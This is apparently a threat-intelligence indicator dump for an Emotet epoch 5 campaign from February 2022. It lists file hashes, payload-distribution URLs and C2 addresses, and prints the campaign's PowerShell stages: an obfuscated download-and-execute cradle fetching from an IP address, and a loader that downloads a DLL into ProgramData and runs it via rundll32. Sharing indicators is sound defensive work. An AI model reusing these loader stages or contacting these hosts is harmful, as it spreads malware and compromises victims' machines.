e5_emotet_08.02.2022.txt
Emotet - e5 - 08.02.2022
************************************************************************************
.xls b64988fe8d0aa76483014e3af670e7b5f0529341a339948967d8a5ba0a44fec3
.dll 41a227b08579b8c6a0461ec05ad8f771a4dfb5aa8269bcd3c229cd925591a70a
http://lbsbriefs.com/cgi/2kl8X826xEKeuhI/
http://howebeautiful.com/eln-images/tyj208/
http://lazylargomotels.com/cgi/wZrYbJ/
http://sleepstarlite-ozark.com/batesville/UjX/
http://osaka.musicaldog.com/05-set/YLBOd/
http://mattknapp.net/Resources/OipJPXsI/
https://erolmutfak.com/dso/S3d34UHm0Qkibn57N0G/
http://catower.com/cgi/iC2/
http://meridianites.com/cgi/pBoGxZ9igKZKn/
http://hoodeeconsulting.com/cgi/I2N0wPElFdvAP2dZ2K6/
http://rinoflexconnectors.com/eln-images/MIzLHf0Wk6wXNS/
https://egemenrulman.com/Fox-C404/qrr2OCShGJGH06Gm/
http://skyridgedesigns.com/eln-images/38pr2cu3xt2Ai/
.xls 719900e330cecd87250ac1f6c31f2d6f42f226294fb011cf47c442f8d2b7455b
.dll da6ce8966d86b8359b27559659ba1b51d41d6bc512667144d9ea9c6c31ec039b
.ps1
# powershell snippet 0
$c1 = "(New-Object Net.We"
$c4 = "bClient).Downlo"
$c3 = "adString('hxxp://91.240.118.172/ss/ss.png')"
$ji = "(New-Object Net.WebClient).DownloadString('hxxp://91.240.118.172/ss/ss.png')"
invoke-expression "(New-Object Net.WebClient).DownloadString('hxxp://91.240.118.172/ss/ss.png')"|invoke-expression
# powershell snippet 1
(new-object net.webclient).downloadstring("hxxp://91.240.118.172/ss/ss.png")
.png
$path = "C{Joo}:\{Joo}Prog{Joo}ramD{Joo}ata\M{Joo}ilossd.{Joo}dl{Joo}l".replace('{Joo}','');
$web = New-Object net.webclient;
$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");
foreach ($url in $urls) {
try {
$web.DownloadFile($url, $path);
if ((Get-Item $path).Length -ge 30000) {
[Diagnostics.Process];
break;
}
}
catch{}
}
Sleep -s 3;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\Milossd.dll',KitKat;
.dll drop
hxxp://mkdevcorp.com/cgi/33HhffLF60pcv/
hxxp://goncalves.com/counter/3OkjcVmCPdokTG/
hxxp://francisdifronzo.com/eln-images/T6yB/
hxxp://k7tgu.com/Bryce/UBfCU05bih/
hxxp://ronfrankproductions.com/4agreements/trEgS/
hxxp://topstravel.com/VPImages/dPW/
hxxp://urieprocor.com/cgi/m2m7z88gOsNceL/
hxxp://mardigrasslandscaping.com/cgi/w4BV/
hxxp://keyesforsteuben.com/cgi/vnBHCHIlWZx/
hxxp://casualenglishchat.com/cgi/6g0pcvCOYPZYn/
hxxp://grimmcm.com/cgi/6hoBPCb3E/
hxxp://intelfirm.com/eln-images/xaTiPeapzK/
hxxp://manningind.com/eln-images/rx7j2VVFK/
C2s
103.42.57.17:8080
93.104.208.37:8080
195.154.146.35:443
62.171.178.147:8080
37.59.209.141:8080
139.196.72.155:8080
37.44.244.177:8080
191.252.103.16:80
217.182.143.207:443
128.199.192.135:8080
103.41.204.169:8080
185.148.168.15:8080
168.197.250.14:80
78.46.73.125:443
194.9.172.107:8080
185.148.168.220:8080
118.98.72.86:443
54.37.106.167:8080
78.47.204.80:443
159.69.237.188:443
116.124.128.206:8080
59.148.253.194:443
85.214.67.203:8080
185.184.25.78:8080
173.203.78.138:443
54.37.228.122:443
198.199.98.78:8080
195.77.239.39:8080
210.57.209.142:8080
66.42.57.149:443
104.131.62.48:8080
54.38.242.185:443
190.90.233.66:443
207.148.81.119:8080
203.153.216.46:443